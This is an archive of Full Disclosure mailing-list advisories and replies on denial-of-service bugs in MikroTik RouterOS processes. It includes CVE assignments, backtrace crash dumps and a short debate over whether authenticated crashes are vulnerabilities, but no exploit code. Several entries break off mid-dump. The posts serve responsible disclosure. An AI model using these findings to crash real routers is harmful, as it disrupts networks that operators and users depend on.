from:"Q C"

Re: [FD] Three vulnerabilities found in MikroTik's RouterOS

2022-06-03 Thread Q C

[update 2022/05/30] Two CVEs have been assigned to these vulnerabilities.

CVE-2021-36613: Mikrotik RouterOs before stable 6.48.2 suffers from a
memory corruption vulnerability in the ptp process. An authenticated remote
attacker can cause a Denial of Service (NULL pointer dereference).

CVE-2021-36614: Mikrotik RouterOs before stable 6.48.2 suffers from a
memory corruption vulnerability in the tr069-client process. An
authenticated remote attacker can cause a Denial of Service (NULL pointer
dereference).


Q C  于2021年7月6日周二 19:26写道：

> Advisory: three vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) from Codesafe Team of Legendsec at
> Qi'anxin Group
>
>
> Product Description
> ==
>
> RouterOS is the operating system used on MikroTik's devices, such as
> switch, router and access point.
>
>
> Description of vulnerabilities
> ==
> 1. reachable assertion failure
> The netwatch process suffers from an assertion failure vulnerability.
> There is a reachable assertion in the netwatch process. By sending a
> crafted packet, an authenticated remote user can crash the netwatch process
> due to assertion failure.
>
> Against stable 6.47, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.29-14:27:25.52@0:
> 2020.06.29-14:27:25.52@0:
> 2020.06.29-14:27:25.52@0: /ram/pckg/advanced-tools/nova/bin/netwatch
> 2020.06.29-14:27:25.52@0: --- signal=6
> 
> 2020.06.29-14:27:25.52@0:
> 2020.06.29-14:27:25.52@0: eip=0x776b855b eflags=0x0246
> 2020.06.29-14:27:25.52@0: edi=0x esi=0x776c0200
> ebp=0x7feea6a0 esp=0x7feea698
> 2020.06.29-14:27:25.52@0: eax=0x ebx=0x00b8
> ecx=0x00b8 edx=0x0006
> 2020.06.29-14:27:25.52@0:
> 2020.06.29-14:27:25.52@0: maps:
> 2020.06.29-14:27:25.52@0: 08048000-0804d000 r-xp  00:10 14
>   /ram/pckg/advanced-tools/nova/bin/netwatch
> 2020.06.29-14:27:25.52@0: 7768a000-776bf000 r-xp  00:0c 966
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.29-14:27:25.52@0: 776c3000-776dd000 r-xp  00:0c 962
>  /lib/libgcc_s.so.1
> 2020.06.29-14:27:25.52@0: 776de000-776ed000 r-xp  00:0c 945
>  /lib/libuc++.so
> 2020.06.29-14:27:25.52@0: 776ee000-7773a000 r-xp  00:0c 947
>  /lib/libumsg.so
> 2020.06.29-14:27:25.52@0: 7774-77747000 r-xp  00:0c 960
>  /lib/ld-uClibc-0.9.33.2.so
> 2020.06.29-14:27:25.52@0:
> 2020.06.29-14:27:25.52@0: stack: 0x7feeb000 - 0x7feea698
> 2020.06.29-14:27:25.52@0: 00 00 6c 77 00 00 6c 77 d8 a6 ee 7f 77 40
> 6b 77 06 00 00 00 00 02 6c 77 20 00 00 00 00 00 00 00
> 2020.06.29-14:27:25.52@0: bc b0 ee 7f 38 a7 ee 7f d4 a6 ee 7f f4 aa
> 73 77 b8 a6 ee 7f f4 aa 73 77 bc b0 ee 7f ff ff ff ff
> 2020.06.29-14:27:25.52@0:
> 2020.06.29-14:27:25.52@0: code: 0x776b855b
> 2020.06.29-14:27:25.52@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff
> f7 d8
>
> This vulnerability was initially found in stable 6.46.2, and it seems that
> the latest stable version 6.48.3 still suffers from this vulnerability.
>
> 2. NULL pointer dereference
> The tr069-client process suffers from a memory corruption vulnerability.
> By sending a crafted packet, an authenticated remote user can crash the
> tr069-client process due to NULL pointer dereference.
>
> Against stable 6.47, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.10-17:04:17.63@0:
> 2020.06.10-17:04:17.63@0:
> 2020.06.10-17:04:17.63@0: /ram/pckg/tr069-client/nova/bin/tr069-client
> 2020.06.10-17:04:17.63@0: --- signal=11
> 
> 2020.06.10-17:04:17.63@0:
> 2020.06.10-17:04:17.63@0: eip=0x0805a185 eflags=0x00010206
> 2020.06.10-17:04:17.63@0: edi=0x7ff74a04 esi=0x7ff74a04
> ebp=0x7ff74988 esp=0x7ff7497c
> 2020.06.10-17:04:17.63@0: eax=0x ebx=0x080a9290
> ecx=0x776924ec edx=0x7769187c
> 2020.06.10-17:04:17.63@0:
> 2020.06.10-17:04:17.63@0: maps:
> 2020.06.10-17:04:17.63@0: 08048000-08096000 r-xp  00:10 13
>   /ram/pckg/tr069-client/nova/bin/tr069-client
> 2020.06.10-17:04:17.63@0: 7762f000-77664000 r-xp  00:0c 966
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.10-17:04:17.63@0: 77668000-77682000 r-xp  00:0c 962
>  /lib/libgcc_s.so.1
> 2020.06.10-17:04:17.63@0: 77683000-77692000 r-xp  00:0c 945
>  /lib/libuc++.s

[FD] Three vulnerabilities found in MikroTik's RouterOS

2021-07-06 Thread Q C

Advisory: three vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) from Codesafe Team of Legendsec at Qi'anxin
Group


Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as
switch, router and access point.


Description of vulnerabilities
==
1. reachable assertion failure
The netwatch process suffers from an assertion failure vulnerability. There
is a reachable assertion in the netwatch process. By sending a crafted
packet, an authenticated remote user can crash the netwatch process due to
assertion failure.

Against stable 6.47, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.29-14:27:25.52@0:
2020.06.29-14:27:25.52@0:
2020.06.29-14:27:25.52@0: /ram/pckg/advanced-tools/nova/bin/netwatch
2020.06.29-14:27:25.52@0: --- signal=6

2020.06.29-14:27:25.52@0:
2020.06.29-14:27:25.52@0: eip=0x776b855b eflags=0x0246
2020.06.29-14:27:25.52@0: edi=0x esi=0x776c0200 ebp=0x7feea6a0
esp=0x7feea698
2020.06.29-14:27:25.52@0: eax=0x ebx=0x00b8 ecx=0x00b8
edx=0x0006
2020.06.29-14:27:25.52@0:
2020.06.29-14:27:25.52@0: maps:
2020.06.29-14:27:25.52@0: 08048000-0804d000 r-xp  00:10 14
/ram/pckg/advanced-tools/nova/bin/netwatch
2020.06.29-14:27:25.52@0: 7768a000-776bf000 r-xp  00:0c 966
   /lib/libuClibc-0.9.33.2.so
2020.06.29-14:27:25.52@0: 776c3000-776dd000 r-xp  00:0c 962
   /lib/libgcc_s.so.1
2020.06.29-14:27:25.52@0: 776de000-776ed000 r-xp  00:0c 945
   /lib/libuc++.so
2020.06.29-14:27:25.52@0: 776ee000-7773a000 r-xp  00:0c 947
   /lib/libumsg.so
2020.06.29-14:27:25.52@0: 7774-77747000 r-xp  00:0c 960
   /lib/ld-uClibc-0.9.33.2.so
2020.06.29-14:27:25.52@0:
2020.06.29-14:27:25.52@0: stack: 0x7feeb000 - 0x7feea698
2020.06.29-14:27:25.52@0: 00 00 6c 77 00 00 6c 77 d8 a6 ee 7f 77 40 6b
77 06 00 00 00 00 02 6c 77 20 00 00 00 00 00 00 00
2020.06.29-14:27:25.52@0: bc b0 ee 7f 38 a7 ee 7f d4 a6 ee 7f f4 aa 73
77 b8 a6 ee 7f f4 aa 73 77 bc b0 ee 7f ff ff ff ff
2020.06.29-14:27:25.52@0:
2020.06.29-14:27:25.52@0: code: 0x776b855b
2020.06.29-14:27:25.52@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7
d8

This vulnerability was initially found in stable 6.46.2, and it seems that
the latest stable version 6.48.3 still suffers from this vulnerability.

2. NULL pointer dereference
The tr069-client process suffers from a memory corruption vulnerability. By
sending a crafted packet, an authenticated remote user can crash the
tr069-client process due to NULL pointer dereference.

Against stable 6.47, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.10-17:04:17.63@0:
2020.06.10-17:04:17.63@0:
2020.06.10-17:04:17.63@0: /ram/pckg/tr069-client/nova/bin/tr069-client
2020.06.10-17:04:17.63@0: --- signal=11

2020.06.10-17:04:17.63@0:
2020.06.10-17:04:17.63@0: eip=0x0805a185 eflags=0x00010206
2020.06.10-17:04:17.63@0: edi=0x7ff74a04 esi=0x7ff74a04 ebp=0x7ff74988
esp=0x7ff7497c
2020.06.10-17:04:17.63@0: eax=0x ebx=0x080a9290 ecx=0x776924ec
edx=0x7769187c
2020.06.10-17:04:17.63@0:
2020.06.10-17:04:17.63@0: maps:
2020.06.10-17:04:17.63@0: 08048000-08096000 r-xp  00:10 13
/ram/pckg/tr069-client/nova/bin/tr069-client
2020.06.10-17:04:17.63@0: 7762f000-77664000 r-xp  00:0c 966
   /lib/libuClibc-0.9.33.2.so
2020.06.10-17:04:17.63@0: 77668000-77682000 r-xp  00:0c 962
   /lib/libgcc_s.so.1
2020.06.10-17:04:17.63@0: 77683000-77692000 r-xp  00:0c 945
   /lib/libuc++.so
2020.06.10-17:04:17.63@0: 77693000-7769d000 r-xp  00:0c 963
   /lib/libm-0.9.33.2.so
2020.06.10-17:04:17.63@0: 7769f000-776bc000 r-xp  00:0c 948
   /lib/libucrypto.so
2020.06.10-17:04:17.63@0: 776bd000-776c r-xp  00:0c 954
   /lib/libxml.so
2020.06.10-17:04:17.63@0: 776c1000-7770d000 r-xp  00:0c 947
   /lib/libumsg.so
2020.06.10-17:04:17.63@0: 7771-7771b000 r-xp  00:0c 955
   /lib/libuhttp.so
2020.06.10-17:04:17.63@0: 7771c000-77724000 r-xp  00:0c 951
   /lib/libubox.so
2020.06.10-17:04:17.63@0: 77728000-7772f000 r-xp  00:0c 960
   /lib/ld-uClibc-0.9.33.2.so
2020.06.10-17:04:17.63@0:
2020.06.10-17:04:17.63@0: stack: 0x7ff75000 - 0x7ff7497c
2020.06.10-17:04:17.63@0: 10 a0 08 08 40 4b 72 77 90 92 0a 08 b8 49 f7
7f 7c fa 71 77 90 92 0a 08 04 4a f7 7f 05 00 00 00
2020.06.10-17:04:17.63@0: 28 4a f7 7f b4 49 f7 7f 40 4b 72 77 88 5b 09
08 40 4b 72 77 80 4d f7 7f 04 4a f7 7f 28 4a f7 7f
2020.06.10-17:04:17.63@0:

[FD] Four vulnerabilities found in MikroTik's RouterOS

2021-05-11 Thread Q C

Advisory: four vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: only CVE-2020-20227 is fixed
CVE: CVE-2020-20220, CVE-2020-20227, CVE-2020-20245, CVE-2020-20246
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on the MikroTik's devices, such as
switch, router and access point.


Description of vulnerabilities
==
These vulnerabilities were reported to the vendor almost one year ago. And
the vendor confirmed these vulnerabilities.

1. CVE-2020-20220
The bfd process suffers from a memory corruption vulnerability. By sending
a crafted packet, an authenticated remote user can crash the bfd process
due to invalid memory access.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.19-18:36:13.88@0:
2020.06.19-18:36:13.88@0:
2020.06.19-18:36:13.88@0: /ram/pckg/routing/nova/bin/bfd
2020.06.19-18:36:13.88@0: --- signal=11

2020.06.19-18:36:13.88@0:
2020.06.19-18:36:13.88@0: eip=0x0804b175 eflags=0x00010202
2020.06.19-18:36:13.88@0: edi=0x08054a90 esi=0x08054298 ebp=0x7f9d3e88
esp=0x7f9d3e70
2020.06.19-18:36:13.88@0: eax=0x08050634 ebx=0x7af0 ecx=0x08051274
edx=0x0001
2020.06.19-18:36:13.88@0:
2020.06.19-18:36:13.88@0: maps:
2020.06.19-18:36:13.88@0: 08048000-0805 r-xp  00:1b 16
/ram/pckg/routing/nova/bin/bfd
2020.06.19-18:36:13.88@0: 7759a000-7759c000 r-xp  00:0c 959
   /lib/libdl-0.9.33.2.so
2020.06.19-18:36:13.88@0: 7759e000-775d3000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.19-18:36:13.88@0: 775d7000-775f1000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.19-18:36:13.88@0: 775f2000-77601000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.19-18:36:13.88@0: 77602000-7775f000 r-xp  00:0c 954
   /lib/libcrypto.so.1.0.0
2020.06.19-18:36:13.88@0: 7776f000-7000 r-xp  00:0c 950
   /lib/libubox.so
2020.06.19-18:36:13.88@0: 8000-777c4000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.19-18:36:13.88@0: 777ca000-777d1000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.19-18:36:13.88@0:
2020.06.19-18:36:13.88@0: stack: 0x7f9d4000 - 0x7f9d3e70
2020.06.19-18:36:13.88@0: 34 06 05 08 d0 e6 04 08 d8 3e 9d 7f 90 4a 05
08 98 42 05 08 d8 3e 9d 7f f8 3e 9d 7f 6d 39 77 77
2020.06.19-18:36:13.88@0: 90 4a 05 08 28 40 9d 7f 05 00 00 00 00 43 05
08 00 00 00 00 28 90 7c 77 01 00 00 00 0c 00 00 00
2020.06.19-18:36:13.88@0:
2020.06.19-18:36:13.88@0: code: 0x804b175
2020.06.19-18:36:13.88@0: ff 05 00 00 00 00 83 c4 10 c9 c3 55 89 e5 53
83

This vulnerability was initially found in long-term 6.44.6, and it seems
that the latest stable version 6.48.2 still suffer from this vulnerability.

2. CVE-2020-20227
The diskd process suffers from a memory corruption vulnerability. By
sending a crafted packet, an authenticated remote user can crash the diskd
process due to invalid memory access.

Against stable 6.47, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.05-15:00:38.33@0:
2020.06.05-15:00:38.33@0:
2020.06.05-15:00:38.33@0: /nova/bin/diskd
2020.06.05-15:00:38.33@0: --- signal=11

2020.06.05-15:00:38.33@0:
2020.06.05-15:00:38.33@0: eip=0x7775a1e3 eflags=0x00010202
2020.06.05-15:00:38.33@0: edi=0x7f9dd024 esi=0x000a ebp=0x7f9dceb8
esp=0x7f9dceac
2020.06.05-15:00:38.33@0: eax=0x000a ebx=0x777624ec ecx=0x08054600
edx=0x08056e18
2020.06.05-15:00:38.33@0:
2020.06.05-15:00:38.33@0: maps:
2020.06.05-15:00:38.33@0: 08048000-08052000 r-xp  00:0c 1049
/nova/bin/diskd
2020.06.05-15:00:38.33@0: 776ff000-77734000 r-xp  00:0c 966
   /lib/libuClibc-0.9.33.2.so
2020.06.05-15:00:38.33@0: 77738000-77752000 r-xp  00:0c 962
   /lib/libgcc_s.so.1
2020.06.05-15:00:38.33@0: 77753000-77762000 r-xp  00:0c 945
   /lib/libuc++.so
2020.06.05-15:00:38.33@0: 77763000-7776b000 r-xp  00:0c 951
   /lib/libubox.so
2020.06.05-15:00:38.33@0: 7776c000-777b8000 r-xp  00:0c 947
   /lib/libumsg.so
2020.06.05-15:00:38.33@0: 777be000-777c5000 r-xp  00:0c 960
   /lib/ld-uClibc-0.9.33.2.so
2020.06.05-15:00:38.33@0:
2020.06.05-15:00:38.33@0: stack: 0x7f9de000 - 0x7f9dceac
2020.06.05-15:00:38.33@0: f4 8a 7b 77 0a 00 00 00 f4 8a 7b 77 e8 ce 9d
7f 92 be 78 77 f8 45 05 08 0a 00 00 00 18 6e 05 08
2020.06.05-15:00:38.33@0: 18 6e 05 08 e4 ce 9d 7f 24 d0 9d 7f 7c 18 76
77 24 d0 9d 7f 18 69 05 08 40 cf 9d 7f a8 cf 9d 7f
2020.06.05-15:00:38.34@0:
2020.06.05-15:00:38.34@0: code: 0x7775a1e3
2020.06.05-15:00:38.34@0: 8b 00 8b 10 01 c2 83 c2 04 52 83 c0 04

Re: [FD] Three vulnerabilities found in MikroTik's RouterOS

2021-05-11 Thread Q C

Hi,

In Mikrotik RouterOs, each user is assigned to a user group, which denotes
the rights of this user. A group policy is a combination of individual
policy items, and provides a convenient way to assign different permissions
and access rights to different user classes.(Reference:
https://help.mikrotik.com/docs/display/ROS/User)

Some common individual policy items are: web, winbox, read, write, reboot
and so on. Among of them, reboot is treated as a separate permission. So an
authenticated user may not have the permission to reboot the device.

As to these vulnerabilities (or software bugs?), reboot permission is not
required to trigger them. And they may pose an impact on the system
services or even reboot the system. Of course, since authentication is
still necessary to trigger them, they have a low impact.

Thanks!


Gynvael Coldwind  于2021年5月8日周六 上午12:09写道：

> Hi,
>
> I might be missing something, but how are these considered vulnerabilities?
> My point is that these require authentication, and an already
> authenticated user already has permissions to reboot the device anyway,
> right?
>
> If the above assumption is correct, then there isn't really a security
> boundary breach, so it would be a software bug, but not a vulnerability.
> Or am I missing something?
>
> Thanks,
> Gynvael
>
> On Fri, May 7, 2021 at 5:51 PM Q C  wrote:
>
>> [update 2021/05/04] Three CVEs have been assigned to these
>> vulnerabilities.
>>
>> CVE-2020-20215: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a
>> memory corruption vulnerability in the /nova/bin/diskd process. An
>> authenticated remote attacker can cause a Denial of Service due to invalid
>> memory access.
>>
>> CVE-2020-20216: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a
>> memory corruption vulnerability in the /nova/bin/graphing process. An
>> authenticated remote attacker can cause a Denial of Service (NULL pointer
>> dereference)
>>
>> CVE-2020-20213: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from an
>> stack exhaustion vulnerability in the /nova/bin/net process. An
>> authenticated remote attacker can cause a Denial of Service due to
>> overloading the systems CPU
>>
>>
>>
>> Q C  于2020年7月22日周三 下午8:11写道：
>>
>> > Advisory: three vulnerabilities found in MikroTik's RouterOS
>> >
>> >
>> > Details
>> > ===
>> >
>> > Product: MikroTik's RouterOS
>> > Vendor URL: https://mikrotik.com/
>> > Vendor Status: fixed version released
>> > CVE: -
>> > Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>> >
>> >
>> > Product Description
>> > ==
>> >
>> > RouterOS is the operating system used on the MikroTik's devices, such as
>> > switch, router and access point.
>> >
>> >
>> > Description of vulnerabilities
>> > ==
>> >
>> > 1. Memory corruption vulnerability
>> > The diskd process suffers from a memory corruption vulnerability. By
>> > sending a crafted packet, an authenticated remote user can crash the
>> diskd
>> > process due to invalid memory access.
>> >
>> > Against stable 6.44.3, the poc resulted in the following crash dump.
>> >
>> > # cat /rw/logs/backtrace.log
>> > 2020.06.04-14:18:22.55@0:
>> > 2020.06.04-14:18:22.55@0:
>> > 2020.06.04-14:18:22.55@0: /nova/bin/diskd
>> > 2020.06.04-14:18:22.55@0: --- signal=11
>> > 
>> > 2020.06.04-14:18:22.55@0:
>> > 2020.06.04-14:18:22.55@0: eip=0x776cd1db eflags=0x00010202
>> > 2020.06.04-14:18:22.55@0: edi=0x08056760 esi=0x08056790
>> > ebp=0x7fd40b78 esp=0x7fd40b6c
>> > 2020.06.04-14:18:22.55@0: eax=0x001b ebx=0x776d54ec
>> > ecx=0x776d54ec edx=0x20fe0010
>> > 2020.06.04-14:18:22.55@0:
>> > 2020.06.04-14:18:22.55@0: maps:
>> > 2020.06.04-14:18:22.55@0: 08048000-08052000 r-xp  00:0c
>> 1131
>> >   /nova/bin/diskd
>> > 2020.06.04-14:18:22.55@0: 77672000-776a7000 r-xp  00:0c 996
>> >  /lib/libuClibc-0.9.33.2.so
>> > 2020.06.04-14:18:22.55@0: 776ab000-776c5000 r-xp  00:0c 992
>> >  /lib/libgcc_s.so.1
>> > 2020.06.04-14:18:22.55@0: 776c6000-776d5000 r-xp  00:0c 976
>> >  /lib/libuc++.so
>> > 2020.06.04-14:18:22.55@0: 776d6000-776de000 r-xp  00:0c 982
>> >  /lib/libubox.so
>> > 2020.06.04-14:18:2

[FD] Four vulnerabilities found in MikroTik's RouterOS

2021-05-07 Thread Q C

Advisory: four vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: no fix yet
CVE: CVE-2020-20214, CVE-2020-20222, CVE-2020-20236, CVE-2020-20237
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on the MikroTik's devices, such as
switch, router and access point.


Description of vulnerabilities
==
These vulnerabilities were reported to the vendor almost one year ago. And
the vendor confirmed these vulnerabilities. However, there is still no fix
for them yet.
By the way, the three vulnerabilities in sniffer binary are different from
each one.

1. CVE-2020-20214
The btest process suffers from an assertion failure vulnerability. There is
a reachable assertion in the btest process. By sending a crafted packet, an
authenticated remote user can crash the btest process due to assertion
failure.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.19-15:51:36.94@0:
2020.06.19-15:51:36.94@0:
2020.06.19-15:51:36.94@0: /nova/bin/btest
2020.06.19-15:51:36.94@0: --- signal=6

2020.06.19-15:51:36.94@0:
2020.06.19-15:51:36.94@0: eip=0x7772255b eflags=0x0246
2020.06.19-15:51:36.94@0: edi=0x00fe0001 esi=0x7772a200 ebp=0x7fdcf880
esp=0x7fdcf878
2020.06.19-15:51:36.94@0: eax=0x ebx=0x010f ecx=0x010f
edx=0x0006
2020.06.19-15:51:36.94@0:
2020.06.19-15:51:36.94@0: maps:
2020.06.19-15:51:36.94@0: 08048000-08057000 r-xp  00:0c 1006
/nova/bin/btest
2020.06.19-15:51:36.94@0: 776f4000-77729000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.19-15:51:36.94@0: 7772d000-77747000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.19-15:51:36.94@0: 77748000-77757000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.19-15:51:36.94@0: 77758000-5000 r-xp  00:0c 947
   /lib/libucrypto.so
2020.06.19-15:51:36.94@0: 6000-777c2000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.19-15:51:36.94@0: 777c8000-777cf000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.19-15:51:36.94@0:
2020.06.19-15:51:36.94@0: stack: 0x7fdd - 0x7fdcf878
2020.06.19-15:51:36.94@0: 00 a0 72 77 00 a0 72 77 b8 f8 dc 7f 77 e0 71
77 06 00 00 00 00 a2 72 77 20 00 00 00 00 00 00 00
2020.06.19-15:51:36.94@0: 16 00 00 00 18 f9 dc 7f b4 f8 dc 7f e4 2a 7c
77 01 00 00 00 e4 2a 7c 77 16 00 00 00 01 00 fe 00
2020.06.19-15:51:36.94@0:
2020.06.19-15:51:36.94@0: code: 0x7772255b
2020.06.19-15:51:36.94@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7
d8

This vulnerability was initially found in long-term 6.44.5, and it seems
that the latest stable version 6.48.2 still suffers from this vulnerability.

2. CVE-2020-20222
The sniffer process suffers from a memory corruption vulnerability. By
sending a crafted packet, an authenticated remote user can crash the
sniffer process due to NULL pointer dereference.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.19-16:36:18.33@0:
2020.06.19-16:36:18.33@0:
2020.06.19-16:36:18.33@0: /nova/bin/sniffer
2020.06.19-16:36:18.33@0: --- signal=11

2020.06.19-16:36:18.33@0:
2020.06.19-16:36:18.33@0: eip=0x08050e33 eflags=0x00010206
2020.06.19-16:36:18.33@0: edi=0x08057a24 esi=0x7f85c094 ebp=0x7f85c0c8
esp=0x7f85c080
2020.06.19-16:36:18.33@0: eax=0x ebx=0x7f85c090 ecx=0x00ff
edx=0x08059678
2020.06.19-16:36:18.33@0:
2020.06.19-16:36:18.33@0: maps:
2020.06.19-16:36:18.33@0: 08048000-08056000 r-xp  00:0c 1034
/nova/bin/sniffer
2020.06.19-16:36:18.33@0: 776ce000-77703000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.19-16:36:18.33@0: 77707000-77721000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.19-16:36:18.33@0: 77722000-77731000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.19-16:36:18.33@0: 77732000-7773a000 r-xp  00:0c 950
   /lib/libubox.so
2020.06.19-16:36:18.33@0: 7773b000-77787000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.19-16:36:18.33@0: 7778d000-77794000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.19-16:36:18.33@0:
2020.06.19-16:36:18.33@0: stack: 0x7f85d000 - 0x7f85c080
2020.06.19-16:36:18.33@0: 2c 08 07 08 04 00 fe 08 fe 00 00 00 20 ad 05
08 00 0c 07 08 a0 0b 07 08 af 0b 07 08 04 7a 05 08
2020.06.19-16:36:18.33@0: 08 00 00 00 24 7a 05 08 ff 00 00 00 00 00 00
00 08 c2 85 7f e4 7a 78 77 d8 c0 85 7f e4 7a 78 77
2020.06.19-16:36:18.34@0:
2020.06.19-16:36:18.34@0: code: 0x8050e33
2020.06.19-16:36:18.34@0: 0b 48 0c 89 fa 89 d8 e8 7d f1 ff ff 50 50 53
56

This vulnerability was initially

Re: [FD] Four vulnerabilities found in MikroTik's RouterOS

2021-05-07 Thread Q C

[Update 2021/05/05] Two CVEs have been assigned to two of these
vulnerabilities.

 CVE-2020-20254: Mikrotik RouterOs before 6.47 (stable tree) suffers from a
memory corruption vulnerability in the /nova/bin/lcdstat process. An
authenticated remote attacker can cause a Denial of Service (NULL pointer
dereference).

CVE-2020-20253: Mikrotik RouterOs before 6.47 (stable tree) in the
/nova/bin/lcdstat process. An authenticated remote attacker can cause a
Denial of Service due to a divide by zero error.



Q C  于2020年7月7日周二 下午10:05写道：

> Advisory: four vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Affected Versions: through stable 6.47
> Fixed Versions: stable 6.47
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ==
>
> RouterOS is the operating system used on the MikroTik's devices, such as
> switch, router and access point.
>
>
> Description of vulnerabilities
> ==
>
> These four vulnerabilities were tested only against the MikroTik RouterOS
> stable release tree when found.
> Maybe other release trees also suffer from these vulnerabilities.
>
> PS: The following three memory corruption vulnerabilities are different.
>
> 1. NULL pointer dereference vulnerability
> The lcdstat process suffers from a memory corruption vulnerability. By
> sending a crafted packet,
> an authenticated remote user can crash the lcdstat process due to NULL
> pointer dereference.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-15:32:04.67@0:
> 2020.06.04-15:32:04.67@0:
> 2020.06.04-15:32:04.67@0: /nova/bin/lcdstat
> 2020.06.04-15:32:04.67@0: --- signal=11
> 
> 2020.06.04-15:32:04.67@0:
> 2020.06.04-15:32:04.67@0: eip=0x0805a26e eflags=0x00010202
> 2020.06.04-15:32:04.67@0: edi=0x esi=0x7fbeaedc
> ebp=0x7fbeae18 esp=0x7fbeadf4
> 2020.06.04-15:32:04.67@0: eax=0x ebx=0x7fbeb848
> ecx=0x0807f14c edx=0x0001
> 2020.06.04-15:32:04.67@0:
> 2020.06.04-15:32:04.67@0: maps:
> 2020.06.04-15:32:04.67@0: 08048000-0807e000 r-xp  00:0c 1054
>   /nova/bin/lcdstat
> 2020.06.04-15:32:04.67@0: 776fd000-77732000 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.04-15:32:04.67@0: 77736000-7775 r-xp  00:0c 960
>  /lib/libgcc_s.so.1
> 2020.06.04-15:32:04.67@0: 77751000-7776 r-xp  00:0c 944
>  /lib/libuc++.so
> 2020.06.04-15:32:04.67@0: 77761000-77769000 r-xp  00:0c 950
>  /lib/libubox.so
> 2020.06.04-15:32:04.67@0: 7776a000-777b6000 r-xp  00:0c 946
>  /lib/libumsg.so
> 2020.06.04-15:32:04.67@0: 777bc000-777c3000 r-xp  00:0c 958
>  /lib/ld-uClibc-0.9.33.2.so
> 2020.06.04-15:32:04.67@0:
> 2020.06.04-15:32:04.67@0: stack: 0x7fbeb000 - 0x7fbeadf4
> 2020.06.04-15:32:04.67@0: 48 b8 be 7f 18 ae be 7f 95 ab 05 08 a0 e5
> 07 08 00 00 00 00 4c f1 07 08 48 b8 be 7f dc ae be 7f
> 2020.06.04-15:32:04.67@0: 00 00 00 00 58 ae be 7f 00 ad 05 08 48 b8
> be 7f 00 00 00 00 00 00 00 00 ec 04 76 77 d8 af be 7f
> 2020.06.04-15:32:04.67@0:
> 2020.06.04-15:32:04.67@0: code: 0x805a26e
> 2020.06.04-15:32:04.67@0: 8b 70 fc ff 73 78 e8 1f c0 ff ff 8b 46 10
> 83 c4
>
> 2. NULL pointer dereference vulnerability
> The lcdstat process suffers from a memory corruption vulnerability. By
> sending a crafted packet,
> an authenticated remote user can crash the lcdstat process due to NULL
> pointer dereference.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-15:48:13.77@0:
> 2020.06.04-15:48:13.77@0:
> 2020.06.04-15:48:13.77@0: /nova/bin/lcdstat
> 2020.06.04-15:48:13.77@0: --- signal=11
> 
> 2020.06.04-15:48:13.77@0:
> 2020.06.04-15:48:13.77@0: eip=0x080562c6 eflags=0x00010246
> 2020.06.04-15:48:13.77@0: edi=0xff00 esi=0x00ff
> ebp=0x7fd8cb48 esp=0x7fd8cb2c
> 2020.06.04-15:48:13.77@0: eax=0x ebx=0x
> ecx=0x edx=0x
> 2020.06.04-15:48:13.77@0:
> 2020.06.04-15:48:13.77@0: maps:
> 2020.06.04-15:48:13.77@0: 08048000-0807e000 r-xp  00:0c 1054
>   /nova/bin/lcdstat
> 2020.06.04-15:48:13.77@0: 776be000-776f3000 r-xp  00:0c 964
